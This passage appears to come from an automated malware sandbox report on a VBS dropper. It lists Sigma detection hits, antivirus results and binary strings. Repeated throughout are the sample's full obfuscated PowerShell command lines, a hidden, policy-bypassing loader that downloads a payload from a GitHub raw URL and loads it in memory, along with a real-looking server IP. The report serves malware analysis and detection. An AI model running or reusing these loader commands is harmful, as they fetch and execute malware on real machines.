K1tjaEFSXTExNytbY2hBUl01NCksW3N0UkluR11bY2hBUl0zNCkuUkVwbEFjRSgnOTRsJyxbc3RSSW5HXVtjaEFSXTM5KSB8ICYoICRFTnY6Q29Nc3BFQ1s0LDI0LDI1XS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7IENFbWFzJysnc2VtYmwnKyd5ICcrJz0gW1InKydlZmxlY3RpbycrJ24uQXNzZW0nKydibHldOicrJzpMJysnb2FkKENFbScrJ2JpbmFyJysneUMnKydvbnRlJysnbnQpOyBbJysnZCcrJ24nKydsJysnaWInKycuSU8uJysnSG9tJysnZV06JysnOlZBSShqdTYnKyd0eCcrJ3QuVFRTU1InKycvMCcrJzA1LycrJzcnKyc0MS4wMycrJzEuMjcxJysnLjcwMScrJy8vJysnOicrJ3B0dGhqdTYsIGp1NmRlc2F0aXZhZG9qdTYsIGp1NmRlc2F0aXYnKydhJysnZG9qdTYnKycsIGp1NmQnKydlc2F0JysnaXZhJysnZG9qdTYsIGp1NlJlZ0EnKydzbWonKyd1JysnNicrJywgaicrJ3U2anU2LCcrJ2p1Nmp1NicrJyknKS5SRXBsQWNFKCdDRW0nLCckJykuUkVwbEFjRSgoW2NoQVJdMTA2K1tjaEFSXTExNytbY2hBUl01NCksW3N0UkluR11bY2hBUl0zNCkuUkVwbEFjRSgnOTRsJyxbc3RSSW5HXVtjaEFSXTM5KSB8ICYoICRFTnY6Q29Nc3BFQ1s0LDI0LDI1XS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, I
Sigma detected: WScript or CScript Dropper
Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2THp7fwNQD.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2THp7fwNQD.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2THp7fwNQD.vbs", ProcessId: 6376, ProcessName: wscript.exe
Sigma detected: Change PowerShell Policies to an Insecure Level
Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7IENFbWFzJysnc2VtYmwnKyd5ICcrJz0gW1InKydlZmxlY3RpbycrJ24uQXNzZW0nKydibHldOicrJzpMJysnb2FkKENFbScrJ2JpbmFyJysneUMnKydvbnRlJysnbnQpOyBbJysnZCcrJ24nKydsJysnaWInKycuSU8uJysnSG9tJysnZV06JysnOlZBSShqdTYnKyd0eCcrJ3QuVFRTU1InKycvMCcrJzA1LycrJzcnKyc0MS4wMycrJzEuMjcxJysnLjcwMScrJy8vJysnOicrJ3B0dGhqdTYsIGp1NmRlc2F0aXZhZG9qdTYsIGp1NmRlc2F0aXYnKydhJysnZG9qdTYnKycsIGp1NmQnKydlc2F0JysnaXZhJysnZG9qdTYsIGp1NlJlZ0EnKydzbWonKyd1JysnNicrJywgaicrJ3U2anU2LCcrJ2p1Nmp1NicrJyknKS5SRXBsQWNFKCdDRW0nLCckJykuUkVwbEFjRSgoW2NoQVJdMTA2K1tjaEFSXTExNytbY2hBUl01NCksW3N0UkluR11bY2hBUl0zNCkuUkVwbEFjRSgnOTRsJyxbc3RSSW5HXVtjaEFSXTM5KSB8ICYoICRFTnY6Q29Nc3BFQ1s0LDI0LDI1XS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7IENFbWFzJysnc2VtYmwnKyd5ICcrJz0gW1InKydlZmxlY3RpbycrJ24uQXNzZW0nKydibHldOicrJzpMJysnb2FkKENFbScrJ2JpbmFyJysneUMnKydvbnRlJysnbnQpOyBbJysnZCcrJ24nKydsJysnaWInKycuSU8uJysnSG9tJysnZV06JysnOlZBSShqdTYnKyd0eCcrJ3QuVFRTU1InKycvMCcrJzA1LycrJzcnKyc0MS4wMycrJzEuMjcxJysnLjcwMScrJy8vJysnOicrJ3B0dGhqdTYsIGp1NmRlc2F0aXZhZG9qdTYsIGp1NmRlc2F0aXYnKydhJysnZG9qdTYnKycsIGp1NmQnKydlc2F0JysnaXZhJysnZG9qdTYsIGp1NlJlZ0EnKydzbWonKyd1JysnNicrJywgaicrJ3U2anU2LCcrJ2p1Nmp1NicrJyknKS5SRXBsQWNFKCdDRW0nLCckJykuUkVwbEFjRSgoW2NoQVJdMTA2K1tjaEFSXTExNytbY2hBUl01NCksW3N0UkluR11bY2hBUl0zNCkuUkVwbEFjRSgnOTRsJyxbc3RSSW5HXVtjaEFSXTM5KSB8ICYoICRFTnY6Q29Nc3BFQ1s0LDI0LDI1XS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, I
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Source: Process startedAuthor: Michael Haag: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2THp7fwNQD.vbs", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2THp7fwNQD.vbs", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4088, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\2THp7fwNQD.vbs", ProcessId: 6376, ProcessName: wscript.exe
Sigma detected: Non Interactive PowerShell Process Spawned
Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7IENFbWFzJysnc2VtYmwnKyd5ICcrJz0gW1InKydlZmxlY3RpbycrJ24uQXNzZW0nKydibHldOicrJzpMJysnb2FkKENFbScrJ2JpbmFyJysneUMnKydvbnRlJysnbnQpOyBbJysnZCcrJ24nKydsJysnaWInKycuSU8uJysnSG9tJysnZV06JysnOlZBSShqdTYnKyd0eCcrJ3QuVFRTU1InKycvMCcrJzA1LycrJzcnKyc0MS4wMycrJzEuMjcxJysnLjcwMScrJy8vJysnOicrJ3B0dGhqdTYsIGp1NmRlc2F0aXZhZG9qdTYsIGp1NmRlc2F0aXYnKydhJysnZG9qdTYnKycsIGp1NmQnKydlc2F0JysnaXZhJysnZG9qdTYsIGp1NlJlZ0EnKydzbWonKyd1JysnNicrJywgaicrJ3U2anU2LCcrJ2p1Nmp1NicrJyknKS5SRXBsQWNFKCdDRW0nLCckJykuUkVwbEFjRSgoW2NoQVJdMTA2K1tjaEFSXTExNytbY2hBUl01NCksW3N0UkluR11bY2hBUl0zNCkuUkVwbEFjRSgnOTRsJyxbc3RSSW5HXVtjaEFSXTM5KSB8ICYoICRFTnY6Q29Nc3BFQ1s0LDI0LDI1XS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7IENFbWFzJysnc2VtYmwnKyd5ICcrJz0gW1InKydlZmxlY3RpbycrJ24uQXNzZW0nKydibHldOicrJzpMJysnb2FkKENFbScrJ2JpbmFyJysneUMnKydvbnRlJysnbnQpOyBbJysnZCcrJ24nKydsJysnaWInKycuSU8uJysnSG9tJysnZV06JysnOlZBSShqdTYnKyd0eCcrJ3QuVFRTU1InKycvMCcrJzA1LycrJzcnKyc0MS4wMycrJzEuMjcxJysnLjcwMScrJy8vJysnOicrJ3B0dGhqdTYsIGp1NmRlc2F0aXZhZG9qdTYsIGp1NmRlc2F0aXYnKydhJysnZG9qdTYnKycsIGp1NmQnKydlc2F0JysnaXZhJysnZG9qdTYsIGp1NlJlZ0EnKydzbWonKyd1JysnNicrJywgaicrJ3U2anU2LCcrJ2p1Nmp1NicrJyknKS5SRXBsQWNFKCdDRW0nLCckJykuUkVwbEFjRSgoW2NoQVJdMTA2K1tjaEFSXTExNytbY2hBUl01NCksW3N0UkluR11bY2hBUl0zNCkuUkVwbEFjRSgnOTRsJyxbc3RSSW5HXVtjaEFSXTM5KSB8ICYoICRFTnY6Q29Nc3BFQ1s0LDI0LDI1XS1qT2lOJycp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD, CommandLine|base64offset|contains: &, I
Sigma detected: Potential Encoded PowerShell Patterns In CommandLine
Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')", CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "('CEmurl '+'= '+'94'+'lhttps:/'+'/raw.githubus'+'erconte'+'nt.'+'com/No'+'Det'+'ectOn/N'+'oDe'+'tec'+'tO'+'n/'+'refs/heads/main/De'+'tahNoth-V.txt94l; CEmba'+'s'+'e'+'64Content'+' = ('+'Ne'+'w-Ob'+'ject S'+'yste'+'m.'+'Net'+'.Web'+'Client).Downlo'+'ad'+'S'+'t'+'ring(CE'+'murl);'+' CEm'+'bi'+'n'+'ar'+'yContent = [Sys'+'tem.C'+'on'+'v'+'e'+'r'+'t]::Fr'+'omBa'+'se64'+'St'+'ring(C'+'E'+'m'+'base64Con'+'te'+'n'+'t); CEmas'+'sembl'+'y '+'= [R'+'eflectio'+'n.Assem'+'bly]:'+':L'+'oad(CEm'+'binar'+'yC'+'onte'+'nt); ['+'d'+'n'+'l'+'ib'+'.IO.'+'Hom'+'e]:'+':VAI(ju6'+'tx'+'t.TTSSR'+'/0'+'05/'+'7'+'41.03'+'1.271'+'.701'+'//'+':'+'ptthju6, ju6desativadoju6, ju6desativ'+'a'+'doju6'+', ju6d'+'esat'+'iva'+'doju6, ju6RegA'+'smj'+'u'+'6'+', j'+'u6ju6,'+'ju6ju6'+')').REplAcE('CEm','$').REplAcE(([chAR]106+[chAR]117+[chAR]54),[stRInG][chAR]34).REplAcE('94l',[stRInG][chAR]39) | &( $ENv:CoMspEC[4,24,25]-jOiN'')", CommandLine|base64offset|contains: v,)^, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCdDRW11cmwgJysnPSAnKyc5NCcrJ2xodHRwczovJysnL3Jhdy5naXRodWJ1cycrJ2VyY29udGUnKydudC4nKydjb20vTm8nKydEZXQnKydlY3RPbi9OJysnb0RlJysndGVjJysndE8nKyduLycrJ3JlZnMvaGVhZHMvbWFpbi9EZScrJ3RhaE5vdGgtVi50eHQ5NGw7IENFbWJhJysncycrJ2UnKyc2NENvbnRlbnQnKycgPSAoJysnTmUnKyd3LU9iJysnamVjdCBTJysneXN0ZScrJ20uJysnTmV0JysnLldlYicrJ0NsaWVudCkuRG93bmxvJysnYWQnKydTJysndCcrJ3JpbmcoQ0UnKydtdXJsKTsnKycgQ0VtJysnYmknKyduJysnYXInKyd5Q29udGVudCA9IFtTeXMnKyd0ZW0uQycrJ29uJysndicrJ2UnKydyJysndF06OkZyJysnb21CYScrJ3NlNjQnKydTdCcrJ3JpbmcoQycrJ0UnKydtJysnYmFzZTY0Q29uJysndGUnKyduJysndCk7I

Suricata Signatures

No Suricata rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Multi AV Scanner detection for domain / URL
Source: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtVirustotal: Detection: 6%Perma Link
Source: http://107.172.130.147Virustotal: Detection: 7%Perma Link
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 98.8% probability
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.12:49710 version: TLS 1.2
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000004.00000002.2427497580.00007FFE168A0000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: System.pdbCB source: powershell.exe, 00000004.00000002.2386191358.00000207290C5000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: \??\C:\Windows\System.Management.Automation.pdbpdb source: powershell.exe, 00000004.00000002.2418527103.00000207430FE000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000004.00000002.2401373905.000002073C03B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2420971299.0000020743660000.00000004.08000000.00040000.00000000.sdmp
